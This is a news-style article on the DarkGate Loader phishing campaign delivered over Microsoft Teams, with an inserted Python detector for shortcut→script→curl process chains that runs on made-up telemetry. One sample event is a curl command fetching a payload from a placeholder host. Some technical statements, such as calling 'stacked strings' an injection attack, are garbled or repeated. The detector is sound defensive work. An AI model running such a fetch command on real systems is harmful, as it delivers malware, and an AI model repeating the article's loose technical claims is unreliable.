Microsoft Teams Hit by Vacation-themed Phishing Malware


In what is a chilling reminder of the escalating sophistication of cyber threats, hackers are now using malware disguised as innocuous company notifications to compromise systems. The latest phishing scam, named "DarkGate Loader," is designed to infiltrate Microsoft Teams with a seemingly harmless message about "changes to the vacation schedule." However, this innocuous-looking link conceals a .ZIP file loaded with malware, ready to jeopardize your system once accessed.

The DarkGate Loader scam has been under scrutiny by the research team Truesec since late August, which found an intricate download process that makes the malware-laden file hard to identify. The hackers have used compromised Office 365 accounts to circulate the malware-infected message via Microsoft Teams. Because the link points to a SharePoint URL and the downloader is a precompiled Windows cURL script, the malicious code hides in plain sight, making it difficult for users to recognize the threat.

New Phishing Scam Targets Microsoft Teams Users

A new sophisticated phishing scam named “DarkGate Loader” is targeting Microsoft Teams users, according to cybersecurity research team Truesec. The malware camouflages itself in an innocuous-looking message about “changes to the vacation schedule.”

The Crafty Camouflage

The scam uses a malicious link that, when clicked, delivers a .ZIP file; once the archive is opened, the malware inside can compromise the user's system. Truesec has been tracking this scam since late August, noting that its multi-stage download process makes the file difficult to identify as malicious.

The infection chain relies on a malicious VBScript hidden behind a Windows shortcut (LNK). Because the download comes from a SharePoint URL, users are less likely to recognize the file as suspicious, and the precompiled Windows cURL script further obscures the code within the file, complicating detection.
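To show what a defender can look for in the delivery chain described above (shortcut, then a script host, then a Windows cURL fetch), here is an added example, not code from the article or from Truesec: a small detector run over constructed process-creation events. The event fields (pid, ppid, image, cmdline), the paths and the URLs are assumptions made up for the example and do not come from the report.

```python
import re
from typing import Iterable

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
LNK_OR_ZIP = re.compile(r"\.(lnk|zip)\b", re.IGNORECASE)


def _image_name(path: str) -> str:
    """Lower-case executable name from a Windows path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_lnk_script_curl_chains(events: Iterable[dict], max_depth: int = 4) -> list:
    """Return pids of curl.exe processes that fetch a remote URL, were spawned by a
    script host, and whose ancestry (up to max_depth) references a .lnk or .zip path.
    Each event is a dict with pid, ppid, image and cmdline (assumed schema)."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in by_pid.values():
        if _image_name(e["image"]) != "curl.exe" or not REMOTE_URL.search(e["cmdline"]):
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or _image_name(parent["image"]) not in SCRIPT_HOSTS:
            continue
        # Walk up from the script host looking for the shortcut/archive that launched it.
        node, depth = parent, 0
        while node is not None and depth < max_depth:
            if LNK_OR_ZIP.search(node["cmdline"]):
                hits.append(e["pid"])
                break
            node, depth = by_pid.get(node["ppid"]), depth + 1
    return hits


# Constructed sample telemetry (not real data): one suspicious chain and two benign ones.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Temp1_vacation schedule.zip\Changes.vbs"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\u\AppData\Local\Temp\stage.bin http://payload.example.invalid/stage.bin"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -sI https://www.example.invalid/"},  # typed at a prompt: no script host
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\scripts\inventory.vbs"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "https://intranet.example.invalid/ping".join(["curl.exe ", ""])},  # no .lnk/.zip in chain
]

if __name__ == "__main__":
    print(find_lnk_script_curl_chains(SAMPLE_EVENTS))  # [300]
```

Only the curl.exe whose script-host parent was launched out of a .zip path is reported; the two other curl.exe instances are left alone, which is the kind of context a process-tree rule needs to avoid flagging every cURL download.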

DarkGate and the Sophos Antivirus

Intriguingly, DarkGate Loader checks whether the Sophos antivirus is installed. If it is not, the malware injects additional code in an attack known as "stacked strings", which launches shellcode that generates a DarkGate executable and loads it into system memory.

From Whence it Came

Hackers have used compromised Office 365 accounts to distribute the malware-infected message through Microsoft Teams. Truesec identified some of the accounts commandeered by the hackers, including those of "Akkaravit Tattamanas" and "ABNER DAVID RIVERA ROJAS".

Not the Only Phishing Scam

DarkGate Loader isn’t the only phishing scam that has hit Microsoft Teams this summer. A group of Russian hackers known as Midnight Blizzard used a social engineering exploit to attack around 40 organizations in August, using compromised Microsoft 365 accounts. Microsoft has since addressed the issue, as reported by Windows Central.

A Trend of Attacks

Last fall, business email compromise (BEC) campaigns became a trend. In this type of scam, a malicious actor masquerades as a company boss and sends a seemingly legitimate email chain with instructions for an employee to transfer money. Another infamous exploit was the Windows zero-day vulnerability Follina, discovered last spring, which allowed hackers to access the Microsoft Support Diagnostic Tool commonly associated with Microsoft Office and Word.


As cyber attacks continue to evolve, ensuring the security of digital communication platforms like Microsoft Teams is crucial. Organizations must educate their employees about these threats and implement robust cybersecurity measures. Users should be cautious when clicking on unfamiliar links, even if they appear to come from trusted sources. Constant vigilance and awareness are the first lines of defense against these ever-evolving cyber threats.
